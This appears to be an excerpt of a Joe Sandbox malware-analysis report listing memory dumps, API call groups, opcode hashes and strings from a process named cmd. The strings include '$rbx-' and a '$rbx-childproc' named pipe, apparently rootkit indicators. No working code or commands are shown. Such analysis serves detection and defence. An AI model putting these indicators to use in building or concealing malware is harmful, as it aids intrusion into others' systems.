        • Source File: 00000012.00000003.2617452152.0000022123BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BF0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_3_22123bf0000_cmd.jbxd
        Similarity
        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
        • String ID: csm$csm$csm
        • API String ID: 849930591-393685449
        • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
        • Instruction ID: b20a8eebf1e74f96e928e47f6a3a1bbbb4c8b585169a5234961efa9d16cfccab
        • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
        • Instruction Fuzzy Hash: 8BD17E32604760E7EB70AFA59448BAD77B0F769788F106315FE895BB5ADB36C0A1C700
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
        • String ID: csm$csm$csm
        • API String ID: 849930591-393685449
        • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
        • Instruction ID: 981b6f9507672b786f69f42c9d40efad8fb101f4a5f4d8578a14454d5235d979
        • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
        • Instruction Fuzzy Hash: 82D18F36604758DAEB25DFA6A448B9D77A0F765788F102206FE896B7D5CB34C4F4C700
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000003.2617455752.0000022123BC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BC0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_3_22123bc0000_cmd.jbxd
        Similarity
        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
        • String ID: csm$csm$csm
        • API String ID: 849930591-393685449
        • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
        • Instruction ID: d080e0794b90445366dca5eb8424c5245918b8a824f91b2a3389a344e87f1bfa
        • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
        • Instruction Fuzzy Hash: B8D16D726047A0DAFB70EFA5948879D77B0F769788F101616FE899BB56DB34C0A0C700
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
        • String ID: csm$csm$csm
        • API String ID: 849930591-393685449
        • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
        • Instruction ID: 734ea23257db87df54cbd4b77dfbf6cc0d4d0384810fd756c6481ac45f8cec4d
        • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
        • Instruction Fuzzy Hash: 17D16E36604B98EAFB24DBA59448B9D77A0F765798F102216EE8D5BB96CF34C4F0C700
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
        • String ID: d
        • API String ID: 3743429067-2564639436
        • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
        • Instruction ID: 8f53cf649f8473b006d54907da3ca272ff069131d9fd40d4dcf0ceb4892921bc
        • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
        • Instruction Fuzzy Hash: 3A41A233214B84DAEB60CF61E44879E77A1F388B88F449216EF891B758DF39D4A5CB40
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
        • String ID: d
        • API String ID: 3743429067-2564639436
        • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
        • Instruction ID: 32c803f958419a6e2ed5ae3377227eef0a14dca4db56dfa3b2a51f5e835b32a9
        • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
        • Instruction Fuzzy Hash: 30419233214B94D6E760CF61E44879E77A1F388B98F449216EF890B758DF39C5A5CB40
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
        • String ID: \\.\pipe\$rbx-childproc
        • API String ID: 166002920-1828357524
        • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
        • Instruction ID: 42928a5a813d5e6400b4694c9d188ee62d512c60562a3007aaaa6028bb9303ba
        • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
        • Instruction Fuzzy Hash: 02116A32618B54D6E7108B61F458B1A7760F398BD4F941312EF590AAA8CF3CC1A4CF40
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
        • String ID: \\.\pipe\$rbx-childproc
        • API String ID: 166002920-1828357524
        • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
        • Instruction ID: f0dc3a13645bd13ef48d8ec83e5efc2ce4545bbb1c3bba5a7d18cff537318322
        • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
        • Instruction Fuzzy Hash: 45117C32618B54D2E7108B61F558B5A7760F398BD4F945312FE990ABA8CF3DC2A4CB40
        APIs
        Memory Dump Source
        • Source File: 00000012.00000003.2617452152.0000022123BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BF0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_3_22123bf0000_cmd.jbxd
        Similarity
        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
        • String ID:
        • API String ID: 190073905-0
        • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
        • Instruction ID: 35bb464337efe15b74f8acbcd8b32768e5b2c1632e3ed7032fcb29791d7c1df7
        • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
        • Instruction Fuzzy Hash: E481D420700265F7F670BFE5984AF5962D0ABB67C0F147395BD044FB96DA3AC5B68700
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
        • String ID:
        • API String ID: 190073905-0
        • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
        • Instruction ID: 4a9e7cb08c64beb4deaf9ea96d27dd6b0f95e48ac4bdbcd0c71d09e4d156ee8e
        • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
        • Instruction Fuzzy Hash: AD81E82070477CEAFA609BE5B44DB692691A7B1784F546327BE096F3D2DB38C8F18700
        APIs
        Memory Dump Source
        • Source File: 00000012.00000003.2617455752.0000022123BC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BC0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_3_22123bc0000_cmd.jbxd
        Similarity
        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
        • String ID:
        • API String ID: 190073905-0
        • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
        • Instruction ID: a91f8ab79a7fa99e6a63271bd5718e50708528def7f9b106c68ef8ebb92718c1
        • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
        • Instruction Fuzzy Hash: 1D81E520700265EEFA74BFE6984FF992290EBB6780F144B15FD494FB96DA38C466C700
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
        • String ID:
        • API String ID: 190073905-0
        • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
        • Instruction ID: 30a8ab7fe086f3a11c49135b9efe97fd424fb8da06ce2693af3d77f50ed91fbe
        • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
        • Instruction Fuzzy Hash: 5781C42060477CE6FA50ABE59499B696290AB75784F447327BE4C4F397DB38C8F18300
        APIs
        • LoadLibraryExW.KERNEL32(?,?,?,0000022123C59C6B,?,?,?,0000022123C5945C,?,?,?,?,0000022123C58F65), ref: 0000022123C59B31
        • GetLastError.KERNEL32(?,?,?,0000022123C59C6B,?,?,?,0000022123C5945C,?,?,?,?,0000022123C58F65), ref: 0000022123C59B3F
        • LoadLibraryExW.KERNEL32(?,?,?,0000022123C59C6B,?,?,?,0000022123C5945C,?,?,?,?,0000022123C58F65), ref: 0000022123C59B69
        • FreeLibrary.KERNEL32(?,?,?,0000022123C59C6B,?,?,?,0000022123C5945C,?,?,?,?,0000022123C58F65), ref: 0000022123C59BD7
        • GetProcAddress.KERNEL32(?,?,?,0000022123C59C6B,?,?,?,0000022123C5945C,?,?,?,?,0000022123C58F65), ref: 0000022123C59BE3
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Library$Load$AddressErrorFreeLastProc
        • String ID: api-ms-
        • API String ID: 2559590344-2084034818
        • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
        • Instruction ID: db1da881f09a12c94f6147342c52c70e79cb3214eff346e492276e49ff7e296a
        • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
        • Instruction Fuzzy Hash: 0431C621212768E5FE259B82B808B9533A4F7A4BA0F592766FD1D5F7D0EF38D4B48700
        APIs
        • LoadLibraryExW.KERNEL32(?,?,?,0000022123C29C6B,?,?,?,0000022123C2945C,?,?,?,?,0000022123C28F65), ref: 0000022123C29B31
        • GetLastError.KERNEL32(?,?,?,0000022123C29C6B,?,?,?,0000022123C2945C,?,?,?,?,0000022123C28F65), ref: 0000022123C29B3F
        • LoadLibraryExW.KERNEL32(?,?,?,0000022123C29C6B,?,?,?,0000022123C2945C,?,?,?,?,0000022123C28F65), ref: 0000022123C29B69
        • FreeLibrary.KERNEL32(?,?,?,0000022123C29C6B,?,?,?,0000022123C2945C,?,?,?,?,0000022123C28F65), ref: 0000022123C29BD7
        • GetProcAddress.KERNEL32(?,?,?,0000022123C29C6B,?,?,?,0000022123C2945C,?,?,?,?,0000022123C28F65), ref: 0000022123C29BE3
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Library$Load$AddressErrorFreeLastProc
        • String ID: api-ms-
        • API String ID: 2559590344-2084034818
        • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
        • Instruction ID: 0bd9b52d13c2eff6a9c61b6d2b2117c531ddcd5b006dfa92630b3eba9b0fef2e
        • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
        • Instruction Fuzzy Hash: 3A31C321312668E1EE25DB969808FA523A4BB69BA0F592727FD1D4F794DF38C4B4C310
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
        • String ID: CONOUT$
        • API String ID: 3230265001-3130406586
        • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
        • Instruction ID: 62d07b6512f648e87b5f3fe9092929fa70d23600ae2bfade2fcf7b5efe49fe0f
        • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
        • Instruction Fuzzy Hash: 6611B431214A64CAE3508B96E858B1967A4F398BF4F501325FE1D8B794CF38D4748B40
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
        • String ID: CONOUT$
        • API String ID: 3230265001-3130406586
        • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
        • Instruction ID: de7f6f7185da1a32f7242c7c1403de5c2a6fdd0a87d9cc91111aca8e2056ed08
        • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
        • Instruction Fuzzy Hash: C9119031310B64D6E7508B92E858B19B6A0F3A8BE4F401316FE5E8BB94CF39C6B48740
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Thread$Current$Context
        • String ID:
        • API String ID: 1666949209-0
        • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
        • Instruction ID: ed7898dc6dec7c1cb2bef08c80be0261e46bfea31a3e693d867eb08c9db76288
        • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
        • Instruction Fuzzy Hash: E9D1A936205B98D1DA70DB4AF49875A77A0F398B98F502216EE8D5B7A5CF3CC5B1CB00
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Thread$Current$Context
        • String ID:
        • API String ID: 1666949209-0
        • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
        • Instruction ID: be0e8397c5f4f26ea3e6a5602ec5a7b9719198e2dbac8eed66db8295ed2c6c64
        • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
        • Instruction Fuzzy Hash: 88D1BB36204B98D5DA70DB4AE49875AB7A0F398B98F101216EECD4B7A5CF7CC5B1CB10
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Free$CurrentThread
        • String ID:
        • API String ID: 564911740-0
        • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
        • Instruction ID: 8beb3a105ca847665b3654b47053aa71ec8f9b1ab897d9b6b1916c86450ee499
        • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
        • Instruction Fuzzy Hash: 9D513A30211B2DE5EB06DBA4E859A9833A5FB24744F802A13BD1D1E3E9EF78D5B5C340
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Free$CurrentThread
        • String ID:
        • API String ID: 564911740-0
        • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
        • Instruction ID: efdfc3e8518672e836f804c8f670068076374954f1ad2ef609bd8ec74c157cc9
        • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
        • Instruction Fuzzy Hash: 3D510930211B6DE5EB45DBA4DC59B9433A1FB24744F806A17BE6C0A3A9EF78C5B5C340
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Heap$Process$AllocFree
        • String ID: $rbx-
        • API String ID: 756756679-3661604363
        • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
        • Instruction ID: 2c277d7d5ec8dd8c88207c1543d70fea0ed7abdbf8f415d5d18a3bda59b27ee1
        • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
        • Instruction Fuzzy Hash: 8F31E721702B69E7EB51CF96F548B6963A0FBA4B84F085226AF481F795EF34D4F18700
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
